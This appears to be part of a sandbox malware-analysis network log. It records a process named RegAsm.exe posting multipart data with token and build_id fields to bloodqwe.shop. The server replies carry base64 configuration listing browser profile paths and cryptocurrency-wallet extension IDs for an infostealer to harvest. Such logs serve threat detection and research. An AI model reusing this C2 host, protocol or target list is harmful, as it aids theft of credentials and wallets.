610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE
2024-09-28 03:23:28 UTC	736	IN	Data Raw: 35 68 63 6e 6c 38 58 45 31 70 59 33 4a 76 63 32 39 6d 64 46 78 46 5a 47 64 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 31 70 59 33 4a 76 63 32 39 6d 64 43 42 46 5a 47 64 6c 49 45 4a 6c 64 47 46 38 58 45 31 70 59 33 4a 76 63 32 39 6d 64 46 78 46 5a 47 64 6c 49 45 4a 6c 64 47 46 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 4e 61 57 4e 79 62 33 4e 76 5a 6e 51 67 52 57 52 6e 5a 53 42 45 5a 58 5a 38 58 45 31 70 59 33 4a 76 63 32 39 6d 64 46 78 46 5a 47 64 6c 49 45 52 6c 64 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 4d 32 4d 43 42 43 63 6d 39 33 63 32 56 79 66 46 77 7a 4e 6a 42 43 63 6d 39 33 63 32 56 79 58 45 4a 79 62 33 64 7a 5a 58 4a 63 56 58 4e 6c 63 Data Ascii: 5hcnl8XE1pY3Jvc29mdFxFZGdlIFN4U1xVc2VyIERhdGF8Y2hyb21lfE1pY3Jvc29mdCBFZGdlIEJldGF8XE1pY3Jvc29mdFxFZGdlIEJldGFcVXNlciBEYXRhfGNocm9tZXxNaWNyb3NvZnQgRWRnZSBEZXZ8XE1pY3Jvc29mdFxFZGdlIERldlxVc2VyIERhdGF8Y2hyb21lfDM2MCBCcm93c2VyfFwzNjBCcm93c2VyXEJyb3dzZXJcVXNlc
2024-09-28 03:23:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49723	172.67.167.90	443	7152	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 03:23:28 UTC	180	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHJJKFCBGIDGHIECGCBK Host: bloodqwe.shop Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-28 03:23:28 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4a 4b 46 43 42 47 49 44 47 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 37 37 66 61 63 36 38 66 30 64 63 64 31 63 32 35 62 34 36 66 36 65 33 39 30 36 39 37 35 39 61 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4a 4b 46 43 42 47 49 44 47 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 30 37 36 62 36 61 30 32 65 62 30 32 38 64 64 65 34 36 31 66 36 34 39 34 66 39 35 35 62 34 39 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4a 4b 46 43 42 47 49 44 47 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 Data Ascii: ------EHJJKFCBGIDGHIECGCBKContent-Disposition: form-data; name="token"977fac68f0dcd1c25b46f6e39069759a------EHJJKFCBGIDGHIECGCBKContent-Disposition: form-data; name="build_id"0076b6a02eb028dde461f6494f955b49------EHJJKFCBGIDGHIECGCBKCont
2024-09-28 03:23:29 UTC	542	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 03:23:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eYsxBO%2BbwDvoUinvl%2FE5L%2BJ2fXasATfhAYPEbZIu81NTcynZy8tSTvSnEd96ZTgPycNX%2FoxDegz6OK7uIElJIxpjnS26z%2FEXRPPzbBKsWvlseH0z2yv9uHlYH0oktXOu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ca09d706c4a0f9d-EWR
2024-09-28 03:23:29 UTC	827	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb
2024-09-28 03:23:29 UTC	1369	IN	Data Raw: 47 6c 30 65 56 64 68 62 47 78 6c 64 48 77 78 66 47 74 77 5a 6d 39 77 61 32 56 73 62 57 46 77 59 32 39 70 63 47 56 74 5a 6d 56 75 5a 47 31 6b 59 32 64 6f 62 6d 56 6e 61 57 31 75 66 44 46 38 4d 48 77 77 66 46 52 6c 63 6e 4a 68 58 31 4e 30 59 58 52 70 62 32 35 38 4d 58 78 68 61 57 6c 6d 59 6d 35 69 5a 6d 39 69 63 47 31 6c 5a 57 74 70 63 47 68 6c 5a 57 6c 71 61 57 31 6b 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 77 78 66 47 52 74 61 32 46 74 59 32 74 75 62 32 64 72 5a 32 4e 6b 5a 6d 68 6f 59 6d 52 6b 59 32 64 6f 59 57 4e 6f 61 32 56 71 5a 57 46 77 66 44 46 38 4d 48 77 77 66 45 46 31 63 6d 39 58 59 57 78 73 5a 58 52 38 4d 58 78 6a 62 6d 31 68 62 57 46 68 59 32 68 77 63 47 35 72 61 6d 64 75 61 57 78 6b 63 47 52 74 61 32 46 68 Data Ascii: Gl0eVdhbGxldHwxfGtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufDF8MHwwfFRlcnJhX1N0YXRpb258MXxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnwxfGRta2FtY2tub2drZ2NkZmhoYmRkY2doYWNoa2VqZWFwfDF8MHwwfEF1cm9XYWxsZXR8MXxjbm1hbWFhY2hwcG5ramduaWxkcGRta2Fh
2024-09-28 03:23:29 UTC	1369	IN	Data Raw: 64 68 62 47 78 6c 64 48 77 78 66 48 42 77 59 6d 6c 69 5a 57 78 77 59 32 70 74 61 47 4a 6b 61 57 68 68 61 32 5a 73 61 32 52 6a 62 32 4e 6a 59 6d 64 69 61 33 42 76 66 44 46 38 4d 48 77 77 66 45 46 31 64 47 68 6c 62 6e 52 70 59 32 46 30 62 33 4a 38 4d 48 78 69 61 47 64 6f 62 32 46 74 59 58 42 6a 5a 48 42 69 62 32 68 77 61 47 6c 6e 62 32 39 76 59 57 52 6b 61 57 35 77 61 32 4a 68 61 58 77 78 66 44 46 38 4d 48 78 48 51 58 56 30 61 43 42 42 64 58 52 6f 5a 57 35 30 61 57 4e 68 64 47 39 79 66 44 42 38 61 57 78 6e 59 32 35 6f 5a 57 78 77 59 32 68 75 59 32 56 6c 61 58 42 70 63 47 6c 71 59 57 78 71 61 32 4a 73 59 6d 4e 76 59 6d 78 38 4d 58 77 78 66 44 46 38 56 48 4a 76 62 6d 6c 31 62 58 77 78 66 48 42 75 62 6d 52 77 62 47 4e 69 61 32 46 72 59 33 42 73 61 32 70 75 62 Data Ascii: dhbGxldHwxfHBwYmliZWxwY2ptaGJkaWhha2Zsa2Rjb2NjYmdia3BvfDF8MHwwfEF1dGhlbnRpY2F0b3J8MHxiaGdob2FtYXBjZHBib2hwaGlnb29vYWRkaW5wa2JhaXwxfDF8MHxHQXV0aCBBdXRoZW50aWNhdG9yfDB8aWxnY25oZWxwY2huY2VlaXBpcGlqYWxqa2JsYmNvYmx8MXwxfDF8VHJvbml1bXwxfHBubmRwbGNia2FrY3Bsa2pub
2024-09-28 03:23:29 UTC	1369	IN	Data Raw: 73 5a 58 52 38 4d 58 78 6f 59 6d 4a 6e 59 6d 56 77 61 47 64 76 61 6d 6c 72 59 57 70 6f 5a 6d 4a 76 62 57 68 73 62 57 31 76 62 47 78 77 61 47 4e 68 5a 48 77 78 66 44 42 38 4d 48 78 53 59 57 6c 75 59 6d 39 33 49 46 64 68 62 47 78 6c 64 48 77 78 66 47 39 77 5a 6d 64 6c 62 47 31 6a 62 57 4a 70 59 57 70 68 62 57 56 77 62 6d 31 73 62 32 6c 71 59 6e 42 76 62 47 56 70 59 57 31 68 66 44 46 38 4d 48 77 77 66 45 35 70 5a 32 68 30 62 48 6c 38 4d 58 78 6d 61 57 6c 72 62 32 31 74 5a 47 52 69 5a 57 4e 6a 59 57 39 70 59 32 39 6c 61 6d 39 75 61 57 46 74 62 57 35 68 62 47 74 6d 59 58 77 78 66 44 42 38 4d 48 78 46 59 33 52 76 49 46 64 68 62 47 78 6c 64 48 77 78 66 47 4a 6e 61 6d 39 6e 63 47 39 70 5a 47 56 71 5a 47 56 74 5a 32 39 76 59 32 68 77 62 6d 74 74 5a 47 70 77 62 32 Data Ascii: sZXR8MXxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHwxfG9wZmdlbG1jbWJpYWphbWVwbm1sb2lqYnBvbGVpYW1hfDF8MHwwfE5pZ2h0bHl8MXxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5hbGtmYXwxfDB8MHxFY3RvIFdhbGxldHwxfGJnam9ncG9pZGVqZGVtZ29vY2hwbmttZGpwb2
2024-09-28 03:23:29 UTC	746	IN	Data Raw: 51 32 68 79 62 32 31 70 64 57 31 38 4d 58 78 6a 61 57 39 71 62 32 4e 77 61 32 4e 73 5a 6d 5a 73 62 32 31 69 59 6d 4e 6d 61 57 64 6a 61 57 70 71 59 32 4a 72 62 57 68 68 5a 6e 77 78 66 44 42 38 4d 48 78 4e 59 57 64 70 59 79 42 46 5a 47 56 75 49 46 64 68 62 47 78 6c 64 48 77 78 66 47 31 72 63 47 56 6e 61 6d 74 69 62 47 74 72 5a 57 5a 68 59 32 5a 75 62 57 74 68 61 6d 4e 71 62 57 46 69 61 57 70 6f 59 32 78 6e 66 44 46 38 4d 48 77 77 66 45 4a 68 59 32 74 77 59 57 4e 72 49 46 64 68 62 47 78 6c 64 48 77 78 66 47 46 6d 62 47 74 74 5a 6d 68 6c 59 6d 56 6b 59 6d 70 70 62 32 6c 77 5a 32 78 6e 59 32 4a 6a 62 57 35 69 63 47 64 73 61 57 39 6d 66 44 46 38 4d 48 77 77 66 46 52 76 62 6d 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 4d 58 78 76 62 57 46 68 59 6d 4a Data Ascii: Q2hyb21pdW18MXxjaW9qb2Nwa2NsZmZsb21iYmNmaWdjaWpqY2JrbWhhZnwxfDB8MHxNYWdpYyBFZGVuIFdhbGxldHwxfG1rcGVnamtibGtrZWZhY2ZubWthamNqbWFiaWpoY2xnfDF8MHwwfEJhY2twYWNrIFdhbGxldHwxfGFmbGttZmhlYmVkYmppb2lwZ2xnY2JjbW5icGdsaW9mfDF8MHwwfFRvbmtlZXBlciBXYWxsZXR8MXxvbWFhYmJ
2024-09-28 03:23:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49724	172.67.167.90	443	7152	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 03:23:29 UTC	180	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFBAECBAEGDGDHIEHIJJ Host: bloodqwe.shop Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-09-28 03:23:29 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 37 37 66 61 63 36 38 66 30 64 63 64 31 63 32 35 62 34 36 66 36 65 33 39 30 36 39 37 35 39 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 30 37 36 62 36 61 30 32 65 62 30 32 38 64 64 65 34 36 31 66 36 34 39 34 66 39 35 35 62 34 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 Data Ascii: ------KFBAECBAEGDGDHIEHIJJContent-Disposition: form-data; name="token"977fac68f0dcd1c25b46f6e39069759a------KFBAECBAEGDGDHIEHIJJContent-Disposition: form-data; name="build_id"0076b6a02eb028dde461f6494f955b49------KFBAECBAEGDGDHIEHIJJCont
2024-09-28 03:23:30 UTC	536	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 03:23:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PA5IhGr7egLZb0%2BRZsMWiv11dtaCWH4yWxrmol9alDUZnEAQj4f7AOZ4zCCffYIKgBwVDPeaPBf3dVCTWO6OkF1nW4umODlF4Rgeev6EKHVOgqOLbr%2BdVBKE8Ozvvnhj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ca09d784b1980d6-EWR
2024-09-28 03:23:30 UTC	114	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
2024-09-28 03:23:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49725	172.67.167.90	443	7152	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 03:23:31 UTC	181	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHIJJEGDBFIIDGCAKJEB Host: bloodqwe.shop Content-Length: 7085 Connection: Keep-Alive Cache-Control: no-cache
2024-09-28 03:23:31 UTC	7085	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 48 49 4a 4a 45 47 44 42 46 49 49 44 47 43 41 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 37 37 66 61 63 36 38 66 30 64 63 64 31 63 32 35 62 34 36 66 36 65 33 39 30 36 39 37 35 39 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 4a 4a 45 47 44 42 46 49 49 44 47 43 41 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 30 37 36 62 36 61 30 32 65 62 30 32 38 64 64 65 34 36 31 66 36 34 39 34 66 39 35 35 62 34 39 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 4a 4a 45 47 44 42 46 49 49 44 47 43 41 4b 4a 45 42 0d 0a 43 6f 6e 74 Data Ascii: ------GHIJJEGDBFIIDGCAKJEBContent-Disposition: form-data; name="token"977fac68f0dcd1c25b46f6e39069759a------GHIJJEGDBFIIDGCAKJEBContent-Disposition: form-data; name="build_id"0076b6a02eb028dde461f6494f955b49------GHIJJEGDBFIIDGCAKJEBCont
2024-09-28 03:23:31 UTC	540	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 03:23:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cgeqDtWi%2FGrLAdtj6k5rOKHJ4bbFWPTn7TlDjkuK%2B0%2FO017qUByMeSBMQ1yMKuFuTa28FQeVws4Qk6Kyf6TDuxQDx1bb496OaJ43NaM6V%2FxdGXfE2OsHzZdXn3NLtEMp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ca09d804c069e05-EWR
2024-09-28 03:23:31 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-09-28 03:23:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49726	172.67.167.90	443	7152	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 03:23:32 UTC	180	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFHCGHJDBFIIDGDHIJDB Host: bloodqwe.shop Content-Length: 829 Connection: Keep-Alive Cache-Control: no-cache
2024-09-28 03:23:32 UTC	829	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 37 37 66 61 63 36 38 66 30 64 63 64 31 63 32 35 62 34 36 66 36 65 33 39 30 36 39 37 35 39 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 30 37 36 62 36 61 30 32 65 62 30 32 38 64 64 65 34 36 31 66 36 34 39 34 66 39 35 35 62 34 39 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 0d 0a 43 6f 6e 74 Data Ascii: ------CFHCGHJDBFIIDGDHIJDBContent-Disposition: form-data; name="token"977fac68f0dcd1c25b46f6e39069759a------CFHCGHJDBFIIDGDHIJDBContent-Disposition: form-data; name="build_id"0076b6a02eb028dde461f6494f955b49------CFHCGHJDBFIIDGDHIJDBCont
2024-09-28 03:23:33 UTC	536	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 03:23:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9ie%2FYb%2B90DADJcAAHvQUSqc83pJ5tqCnRwPnUYqMnvHnnlQOP69lmNBh1P3X2kzaIucX4xAsNl8LgclfoURKRvMo6XytQlemdEORhJ1QFFn8Lte9J1sAMj2Nob4mGS5l"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ca09d86afd6de96-EWR
2024-09-28 03:23:33 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-09-28 03:23:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49727	172.67.167.90	443	7152	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 03:23:33 UTC	180	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCBFBGCGIJKJJKFIDBFC Host: bloodqwe.shop Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-09-28 03:23:33 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 37 37 66 61 63 36 38 66 30 64 63 64 31 63 32 35 62 34 36 66 36 65 33 39 30 36 39 37 35 39 61 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 30 37 36 62 36 61 30 32 65 62 30 32 38 64 64 65 34 36 31 66 36 34 39 34 66 39 35 35 62 34 39 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 0d 0a 43 6f 6e 74 Data Ascii: ------GCBFBGCGIJKJJKFIDBFCContent-Disposition: form-data; name="token"977fac68f0dcd1c25b46f6e39069759a------GCBFBGCGIJKJJKFIDBFCContent-Disposition: form-data; name="build_id"0076b6a02eb028dde461f6494f955b49------GCBFBGCGIJKJJKFIDBFCCont
2024-09-28 03:23:34 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 03:23:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qFIj75a5GMVhdkgyyYGS3bHaqLtYKHjqjQq0iMRuZRzEXRKkimqliIOgLJ%2FPCCA%2BUOd9YuLcyzjNnY3UZHmk97GPEWkba%2BiWMtHCkCx8MtojbUu1x3t852LPgmVtctLO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ca09d8d8e77433a-EWR
2024-09-28 03:23:34 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-09-28 03:23:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49728	172.67.167.90	443	7152	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 03:23:34 UTC	180	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGIDAAAKJJDBGCBFCBGI Host: bloodqwe.shop Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-09-28 03:23:34 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 37 37 66 61 63 36 38 66 30 64 63 64 31 63 32 35 62 34 36 66 36 65 33 39 30 36 39 37 35 39 61 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 30 37 36 62 36 61 30 32 65 62 30 32 38 64 64 65 34 36 31 66 36 34 39 34 66 39 35 35 62 34 39 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 Data Ascii: ------CGIDAAAKJJDBGCBFCBGIContent-Disposition: form-data; name="token"977fac68f0dcd1c25b46f6e39069759a------CGIDAAAKJJDBGCBFCBGIContent-Disposition: form-data; name="build_id"0076b6a02eb028dde461f6494f955b49------CGIDAAAKJJDBGCBFCBGICont
2024-09-28 03:23:35 UTC	548	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 03:23:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ol6s%2B1uc%2Bj2pWUtI56UrQIqiFY%2B5bXWy0nkU%2BFE8V8tK66AekOuDQtQZgpyDKjvlO%2F1t2W1uJUFj87vqTVP%2F%2BCJaYNMYJhvdKIUjXmVeaZQHf%2FbTijGafR44HwgYPzcw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ca09d946cb7176c-EWR
2024-09-28 03:23:35 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-09-28 03:23:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49729	172.67.167.90	443	7152	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 03:23:35 UTC	180	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAAEBKEGHJKEBFHJDBF Host: bloodqwe.shop Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
